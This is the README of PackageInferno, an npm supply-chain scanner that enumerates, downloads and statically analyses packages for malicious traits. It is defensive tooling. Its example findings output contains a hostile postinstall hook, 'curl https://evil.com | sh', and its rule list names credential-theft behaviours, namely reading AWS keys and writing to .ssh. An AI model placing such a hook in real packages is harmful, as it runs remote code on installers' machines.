PackageInferno

Blazingly simple, Docker‑first npm supply‑chain scanner. One compose file runs:

Enumerator → builds the queue of packages
Fetcher → downloads tarballs (and optionally uploads to S3)
Analyzer → static analysis + optional YARA
Postgres → local DB for findings
Streamlit Dashboard → visualize findings on http://localhost:8501

This is the container‑only edition. The project can be built to scale using EC2, SQS and RDS. Most of it is setup for it in the toolset.

What you get

End‑to‑end pipeline in Docker (no host installs beyond Docker)
Configurable rules via scan.yml (allowlists, thresholds, YARA)
Local Postgres schema + scan history (scan_runs) ready to go
Optional S3 uploads for tarballs and findings (credentials via ~/.aws)
Streamlit dashboard: search, drill‑down, and analytics

docker-compose.yml – services: db, enumerator, fetcher, analyzer, dashboard, init-db
enumerator/ – Node worker that builds the NDJSON queue
fetcher/ – Node worker that downloads tarballs (+ uploads to S3 if enabled)
analyzer/ – Python static analyzer (+ optional YARA inline)
dashboard/ – Streamlit app (port 8501)
infra/migrations.sql – core DB schema (packages, versions, findings, scores, indexes)
infra/20251106_scan_runs.sql – scan history table
scan.yml – analysis configuration (rules, scoring, allowlists, YARA)
scripts/run_pipeline.sh – run enumerate → fetch → analyze
scripts/init_db.sh – bootstrap DB schema
scripts/test_setup.sh – automated setup validation
SCANNING_GUIDE.md – detailed scanning strategies and examples

Quick start (local)

Prereqs: Docker Desktop (or engine) with Compose v2.

One-Line Install

curl -fsSL https://raw.githubusercontent.com/MHaggis/Package-Inferno/main/install.sh | bash

This clones the repo to ~/package-inferno and gives you instructions to get started.

Option A: Use Pre-built Images (Fastest)

Pull and run pre-built containers from GitHub Container Registry:

# Clone the repo (for config files and scripts)
git clone https://github.com/MHaggis/Package-Inferno.git
cd Package-Inferno

# Run with pre-built images
docker compose -f docker-compose.ghcr.yml up -d db
./scripts/init_db.sh
SEEDS="lodash,express" docker compose -f docker-compose.ghcr.yml run --rm enumerator
docker compose -f docker-compose.ghcr.yml run --rm fetcher
docker compose -f docker-compose.ghcr.yml run --rm analyzer

Available images:

ghcr.io/mhaggis/package-inferno/enumerator:main
ghcr.io/mhaggis/package-inferno/fetcher:main
ghcr.io/mhaggis/package-inferno/analyzer:main

Option B: Build from Source

Automated Setup Validation

Run the test script to validate your installation:

./scripts/test_setup.sh

This will:

✓ Check Docker and Docker Compose
✓ Start and initialize the database
✓ Run a test scan (2 packages)
✓ Verify findings are stored correctly

Manual Setup

Start Postgres and initialize schema:

docker compose up -d db
./scripts/init_db.sh

Run the pipeline:

./scripts/run_pipeline.sh

Launch the dashboard:

docker compose up -d dashboard
# open http://localhost:8501

Findings land under ./out/findings/*.findings.json and in the findings table when DB is enabled.

Scanning Modes

PackageInferno supports multiple scanning strategies depending on your goals:

Mode	Use Case	Speed	Coverage	Command
Specific Seeds	Test/investigate known packages	Fastest	Targeted	`SEEDS="pkg1,pkg2"`
Small Batch	Validate setup, sample scan	Fast	10-100 pkgs	`MAX_CHUNKS=2 CHUNK_LIMIT=10`
Full Registry	Comprehensive supply chain audit	Hours-Days	2M+ pkgs	`MAX_CHUNKS=0 CHUNK_LIMIT=100`
Changes Feed	Monitor new releases (included automatically)	Real-time	Recent updates	Built-in

1. Scan Specific Packages (Recommended for Testing)

Target specific packages you want to analyze:

# Single command with seeds
export SEEDS="lodash,express,axios"
./scripts/run_pipeline.sh

# Or from a file
echo -e "react\nvue\nangular" > packages.txt
export SEEDS_FILE=packages.txt
./scripts/run_pipeline.sh

How I tested initially: Used SEEDS="is-odd,is-even" for quick validation.

2. Scan from npm Registry (_all_docs)

Scan packages paginated from npm's registry:

# Clean previous runs
rm -rf downloads/* out/*

# Scan 2 pages of 10 packages each (20 packages)
export MAX_CHUNKS=2        # Number of pages
export CHUNK_LIMIT=10      # Packages per page
unset SEEDS                # Important: disable seeds mode

# Run individual steps for better visibility
docker compose run --rm enumerator  # Discovers and queues
docker compose run --rm fetcher     # Downloads tarballs
docker compose run --rm analyzer    # Scans for threats

Example output:

config: chunkLimit=10, maxChunks=2
checking recent changes feed...
changes feed: enqueued 2 new versions
enumerating via _all_docs (fresh scan)
page 1/2 count: 10
page 2/2 count: 10
done, enqueued 22 (22 new versions)

3. Continuous Monitoring (Unbounded Scan)

Scan the entire npm registry:

export MAX_CHUNKS=0        # 0 = unbounded
export CHUNK_LIMIT=100     # Larger batches for efficiency
./scripts/run_pipeline.sh

Warning: This will run for hours/days and scan hundreds of thousands of packages. Monitor disk space and database size.

4. Resume Interrupted Scans

The enumerator saves state to ./out/enumerator_state.json with cursor position:

{
  "last_seq": "0",
  "last_startkey": "package-name",
  "last_run": "2025-11-23T19:24:49.123Z",
  "last_processed": 22,
  "last_new": 22
}

Simply re-run the pipeline and it will resume from the last cursor:

./scripts/run_pipeline.sh  # Automatically resumes

To force a fresh scan:

rm -f out/enumerator_state.json
./scripts/run_pipeline.sh

Example Scan Results

From a 2-page scan of 22 packages, here's what PackageInferno detected:

-- Top suspicious packages by score
SELECT p.name, s.score, s.label, COUNT(f.id) as findings 
FROM packages p 
JOIN versions v ON p.id = v.package_id 
JOIN scores s ON v.id = s.version_id 
LEFT JOIN findings f ON v.id = f.version_id 
GROUP BY p.name, s.score, s.label 
ORDER BY s.score DESC;

-- Results:
   name                | score | label      | findings
-----------------------+-------+------------+----------
 rendition             | 606   | malicious  | 153
 vs-deploy             | 454   | malicious  | 119
 --123hoodmane-pyodide | 213   | malicious  | 46

What made rendition so suspicious?

57 × url_outside_allowlist - Non-allowlisted domains
46 × suspicious_pattern - Shell/eval patterns
12 × advanced_obfuscation - Hex encoding, XOR, string arrays
6 × big_base64_blob - Large encoded payloads
18 × url_in_code - Embedded URLs

The scoring system (configured in scan.yml) aggregates these findings to produce a risk score and label (clean, suspicious, or malicious).

Exploring Results

Via Dashboard (Recommended)

Open http://localhost:8501 after running docker compose up -d dashboard

Features:

📊 Overview Tab: Summary stats, score distribution charts
🔍 Search Tab: Find packages by name, filter by risk label
⚠️ High Risk Tab: Top malicious packages with drill-down
🎯 C2 Analysis: Packages with known exfiltration endpoints
📈 Analytics Tab: Trends, common rules, temporal analysis

Via Database Queries

Direct SQL access for custom analysis:

# Connect to database
docker exec -it pi-postgres psql -U piuser -d packageinferno

Useful queries:

-- Packages with credential theft attempts
SELECT DISTINCT p.name, v.version, s.score
FROM packages p
JOIN versions v ON p.id = v.package_id
JOIN findings f ON v.id = f.version_id
JOIN scores s ON v.id = s.version_id
WHERE f.rule = 'env_snoop'
ORDER BY s.score DESC;

-- All C2/webhook destinations found
SELECT p.name, f.details->>'endpoints' as c2_endpoints
FROM packages p
JOIN versions v ON p.id = v.package_id
JOIN findings f ON v.id = f.version_id
WHERE f.rule = 'c2_webhook';

-- Typosquatting attempts
SELECT 
  p.name,
  f.details->>'target_package' as impersonating,
  f.details->>'similarity' as similarity_pct,
  f.details->>'typosquat_type' as attack_type
FROM packages p
JOIN versions v ON p.id = v.package_id
JOIN findings f ON v.id = f.version_id
WHERE f.rule = 'typosquat_detected'
ORDER BY (f.details->>'similarity')::float DESC;

-- Packages with native binaries
SELECT p.name, f.details->>'path' as binary_path
FROM packages p
JOIN versions v ON p.id = v.package_id
JOIN findings f ON v.id = f.version_id
WHERE f.rule = 'native_binary_present';

Via JSON Files

Findings are also saved as structured JSON in ./out/findings/:

# View findings for a specific package
cat out/findings/packagename@1.0.0.findings.json | jq .

# Count findings by severity
jq -r '.findings[].severity' out/findings/*.findings.json | sort | uniq -c

# Extract all C2 URLs found
jq -r '.findings[] | select(.rule=="c2_webhook") | .details.full_urls[]' out/findings/*.findings.json

Optional: S3 integration (tarballs + findings)

If you want artifacts in S3:

Create buckets (choose your own names):
- package-inferno-tarballs (raw npm tarballs)
- package-inferno-findings (analyzer outputs)
Ensure your ~/.aws contains valid credentials (profile or environment based).
Export env vars before running the pipeline:

export AWS_REGION=us-west-2
export S3_TARBALLS=package-inferno-tarballs
export S3_FINDINGS=package-inferno-findings
export AWS_PROFILE=default   # optional; or rely on env creds

The compose mounts ~/.aws into fetcher and analyzer. If LOCAL_ONLY=false, the fetcher uploads tarballs to S3_TARBALLS. If S3_FINDINGS is set, analyzer uploads findings JSON after writing locally.

Minimal IAM policy example (attach to user/role you’re using):

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "S3Access",
      "Effect": "Allow",
      "Action": ["s3:PutObject","s3:GetObject","s3:ListBucket"],
      "Resource": [
        "arn:aws:s3:::package-inferno-tarballs",
        "arn:aws:s3:::package-inferno-tarballs/*",
        "arn:aws:s3:::package-inferno-findings",
        "arn:aws:s3:::package-inferno-findings/*"
      ]
    }
  ]
}

Configuration

Main knobs live in scan.yml. Highlights:

analysis.allow_domains – domains that won’t raise “outside allowlist”
analysis.allowlist.build_tools – regexes for benign build steps
analysis.yara.* – enable inline YARA (default on), rule path, size/time limits
scoring.rule_weights and scoring.thresholds – tune “suspicious/malicious”

Container environments you can set:

Enumerator:
- DAYS (default 30), CHUNK_LIMIT (default 100), MAX_CHUNKS (default 5)
- SEEDS, SEEDS_FILE – seed package names
- LOCAL_ONLY=true (queue to file), DB_URL for dedupe against DB
Fetcher:
- LOCAL_ONLY=false to upload tarballs to S3
- S3_TARBALLS, AWS_REGION, AWS_PROFILE
Analyzer:
- MAX_EXTRACT_BYTES=0 for unlimited extraction
- S3_FINDINGS, AWS_REGION
- DB_URL to write findings and scores into Postgres

The DB URL is pre‑wired for local compose:

postgres://piuser:pipass@db:5432/packageinferno

How it works (flow)

Enumerator hits npm registry and writes an NDJSON queue to ./out/fetch_queue.ndjson (and can upsert "queued" versions to DB).
Fetcher reads the queue, downloads tarballs to ./downloads, and uploads to S3 if configured.
Analyzer scans tarballs with heuristics + optional YARA and writes structured findings JSON to ./out/findings. If DB is configured, it upserts findings and scores.
Dashboard queries the local DB to visualize stats, search packages, and drill into details.

Component Details

Enumerator (`enumerator/src/enumerator.js`)

Purpose: Discovers npm packages to scan and builds the work queue.

What it does:

Pulls package metadata from npm's registry and replication feed
Supports multiple modes:
- Seeds mode: Scan specific packages via SEEDS env var or SEEDS_FILE
- Changes feed: Monitor _changes endpoint for recent updates
- Full scan: Paginate through _all_docs endpoint (with resumable cursor)
Deduplicates against DB to avoid re-scanning analyzed versions
Outputs NDJSON queue to ./out/fetch_queue.ndjson or SQS

Key environment variables:

SEEDS="pkg1,pkg2" - Comma-separated package names to scan
SEEDS_FILE - Path to text file with one package per line
MAX_CHUNKS=5 - Limit pagination (0 = unbounded)
CHUNK_LIMIT=100 - Packages per API page
DB_URL - Postgres connection for deduplication

Example usage:

# Scan specific packages
export SEEDS="lodash,express,axios"
docker compose run --rm enumerator

# Scan from file
echo -e "react\nvue\nangular" > packages.txt
export SEEDS_FILE=packages.txt
docker compose run --rm enumerator

Fetcher (`fetcher/src/fetcher.js`)

Purpose: Downloads npm tarballs from the registry.

What it does:

Reads queue from ./out/fetch_queue.ndjson (or SQS)
Downloads tarballs with retry logic and backoff
Verifies SHA1 checksums (warns on mismatch)
Saves to ./downloads/ as scope__name@version.tgz
Optionally uploads to S3 bucket (S3_TARBALLS)
Forwards completed jobs to analyzer queue (SQS mode)

Key environment variables:

LOCAL_ONLY=true - Skip S3 uploads (local-only mode)
S3_TARBALLS - S3 bucket name for tarball storage
DOWNLOAD_DIR=./downloads - Local output directory
MAX_RETRIES=5 - HTTP retry attempts

S3 key format: npm-raw-tarballs/{name}/{version}.tgz

Analyzer (`analyzer/src/analyzer.py`)

Purpose: Static analysis engine that detects malicious patterns in packages.

What it does:

Extracts tarballs with safety checks (path traversal, size limits)
Parses package.json for metadata and lifecycle hooks
Scans all files for suspicious patterns:
- Lifecycle hooks: Shell spawns, downloaders in install scripts
- Network activity: HTTP clients, C2 webhooks (Discord, Telegram, etc.)
- Obfuscation: High entropy, base64 blobs, hex encoding, XOR
- Credential theft: Environment variable access, FS writes to sensitive paths
- Typosquatting: Levenshtein distance + unicode substitution checks
- Phishing: Fake CAPTCHA, credential forms, iframe embeds
- Binaries: Native executables, WASM, prebuilt fetchers
Runs YARA rules (downloaded from YARA-Forge) if enabled
Scores findings using weighted rules from scan.yml
Writes structured JSON to ./out/findings/ and upserts to DB

Detection rules (see analyzer/src/analyzer.py for full list):

lifecycle_script - Risky install/postinstall hooks
url_outside_allowlist - Network calls to non-allowed domains
c2_webhook - Known exfil endpoints (Discord, Slack, Telegram)
env_snoop - Access to AWS keys, tokens, passwords
writes_outside_pkg - FS writes to .ssh, .npmrc, system dirs
typosquat_detected - Package name similar to popular packages
advanced_obfuscation - Hex, XOR, string arrays, control flow flattening
yara_match - YARA rule hits (malware, exploits, webshells)
phishing_form - Credential harvesting forms
native_binary_present - PE/ELF/Mach-O executables

Key environment variables:

MAX_EXTRACT_BYTES=0 - Extraction size limit (0 = unlimited)
SCAN_YML=/app/scan.yml - Path to config file
DB_URL - Postgres connection for findings storage
S3_FINDINGS - S3 bucket for findings upload

Output format (*.findings.json):

{
  "tgz": "/downloads/pkg@1.0.0.tgz",
  "findings": [
    {
      "rule": "lifecycle_script",
      "severity": "high",
      "details": {
        "key": "postinstall",
        "value": "curl https://evil.com | sh",
        "tags": ["shell_spawn", "downloader"],
        "explanation": "High-risk postinstall hook: shell_spawn, downloader"
      }
    }
  ]
}

Customizing the Analyzer

Adding New Detection Rules

1. Pattern-based detection (add to analyzer/src/analyzer.py):

# Define regex pattern
CUSTOM_PATTERN_RE = re.compile(rb'dangerous-function\s*\(', re.I)

# Add to analyze_file_bytes() function
def analyze_file_bytes(path: Path, b: bytes, allow_domains: list[str]):
    # ... existing code ...
    
    # Your custom check
    if CUSTOM_PATTERN_RE.search(b):
        out.append({
            'rule': 'custom_dangerous_function',
            'severity': 'high',
            'details': {
                'path': str(path),
                'explanation': 'Detected dangerous-function call'
            }
        })
    
    return out

2. Add scoring weights (scan.yml):

scoring:
  rule_weights:
    custom_dangerous_function: 6  # Your new rule
    # ... existing rules ...
  thresholds:
    suspicious: 7
    malicious: 12

3. Update the scoring function (analyzer/src/analyzer.py):

def score_findings(findings, scoring):
    weights = scoring.get('rule_weights', {})
    score = 0
    for f in findings:
        rule = f['rule']
        w = 0
        # ... existing rules ...
        elif rule == 'custom_dangerous_function':
            w = weights.get('custom_dangerous_function', 6)
        score += int(w)
    # ... rest of function ...

Adding Custom YARA Rules

1. Create custom rule file (yara-rules/custom.yar):

rule CustomMalware {
    meta:
        description = "Detects custom threat pattern"
        severity = "high"
    strings:
        $s1 = "malicious_string" ascii
        $s2 = /evil_regex_[0-9]{4}/
    condition:
        any of them
}

2. Update scan.yml:

analysis:
  yara:
    enabled: true
    rules_path: yara-rules/custom.yar  # Point to your rules
    max_file_size_mb: 10
    timeout_seconds: 30

3. Mount custom rules in docker-compose.yml:

analyzer:
  volumes:
    - ./yara-rules:/app/yara-rules:ro

Domain Allowlist

Add trusted domains to scan.yml to reduce false positives:

analysis:
  allow_domains:
    - registry.npmjs.org
    - github.com
    - your-cdn.com  # Add your domain

Benign Build Tools

Allowlist legitimate build commands:

analysis:
  allowlist:
    build_tools:
      - \bmy-custom-build-tool\b
      - \bmake\s+clean\b

Troubleshooting

“Database connection failed”: make sure docker compose up -d db is running, then re‑run ./scripts/init_db.sh.
“AccessDenied” when pushing to S3: verify ~/.aws/credentials, AWS_REGION, and bucket policy/permissions.
YARA timeouts: lower file size limits or disable inline YARA in scan.yml (analysis.yara.enabled: false).
Rate‑limits from npm: the pipeline retries with backoff and sets a UA; you can lower CHUNK_LIMIT or increase MAX_CHUNKS gradually.

Name		Name	Last commit message	Last commit date
Latest commit History 8 Commits
.github/workflows		.github/workflows
analyzer		analyzer
dashboard		dashboard
enumerator		enumerator
fetcher		fetcher
infra		infra
logo		logo
scripts		scripts
.gitignore		.gitignore
LICENSE		LICENSE
README.md		README.md
SCANNING_GUIDE.md		SCANNING_GUIDE.md
docker-compose.ghcr.yml		docker-compose.ghcr.yml
docker-compose.yml		docker-compose.yml
install.sh		install.sh
scan.yml		scan.yml

Folders and files

Latest commit

History

Repository files navigation

PackageInferno

What you get

Contents

Quick start (local)

One-Line Install

Option A: Use Pre-built Images (Fastest)

Option B: Build from Source

Automated Setup Validation

Manual Setup

Scanning Modes

1. Scan Specific Packages (Recommended for Testing)

2. Scan from npm Registry (_all_docs)

3. Continuous Monitoring (Unbounded Scan)

4. Resume Interrupted Scans

Example Scan Results

Exploring Results

Via Dashboard (Recommended)

Via Database Queries

Via JSON Files

Optional: S3 integration (tarballs + findings)

Configuration

How it works (flow)

Component Details

Enumerator (enumerator/src/enumerator.js)

Fetcher (fetcher/src/fetcher.js)

Analyzer (analyzer/src/analyzer.py)

Customizing the Analyzer

Adding New Detection Rules

Adding Custom YARA Rules

Domain Allowlist

Benign Build Tools

Troubleshooting

About

Topics

Resources

License

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Enumerator (`enumerator/src/enumerator.js`)

Fetcher (`fetcher/src/fetcher.js`)

Analyzer (`analyzer/src/analyzer.py`)

Packages